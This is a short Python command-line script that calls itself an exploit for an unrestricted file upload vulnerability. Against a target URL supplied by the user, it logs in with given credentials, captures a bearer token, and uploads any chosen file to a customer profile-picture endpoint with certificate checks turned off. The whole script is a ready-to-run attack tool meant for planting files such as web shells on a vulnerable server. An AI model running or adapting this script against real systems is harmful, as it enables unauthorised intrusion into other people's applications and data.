import requests
import argparse
import sys


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def login(url, username, password):
    """Authenticate with the API and return the Bearer token."""
    login_endpoint = f"{url}/api/v1/user/login"
    headers = {"Content-Type": "application/json"}
    payload = {
        "username": username,
        "password": password
    }

    try:
        response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)
        response.raise_for_status()

        # Extract token
        token = response.json().get("token")
        if not token:
            print("[!] Token not found in response. Exiting.")
            sys.exit(1)

        print("[+] Authentication successful. Token acquired.")
        return token
    except Exception as e:
        print(f"[!] Login failed: {e}")
        sys.exit(1)

def upload_file(url, token, file_path):
    """Upload a file to the profile picture endpoint using the Bearer token."""
    upload_endpoint = f"{url}/api/v1/customer/profile-picture"
    headers = {
        "Authorization": f"Bearer {token}"
    }
    files = {
        "file": open(file_path, "rb")
    }

    try:
        response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)
        response.raise_for_status()

        if response.status_code == 200:
            print("[+] File uploaded successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[!] Failed to upload file. Status code: {response.status_code}")
            print(f"[!] Response: {response.text}")
    except Exception as e:
        print(f"[!] File upload failed: {e}")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.")
    parser.add_argument("-u", "--username", required=True, help="Username for login")
    parser.add_argument("-p", "--password", required=True, help="Password for login")
    parser.add_argument("-f", "--file", required=True, help="File to upload")
    parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)")

    args = parser.parse_args()

    # Authenticate 
    token = login(args.url, args.username, args.password)

    # Upload the file
    upload_file(args.url, token, args.file)

if __name__ == "__main__":
    main()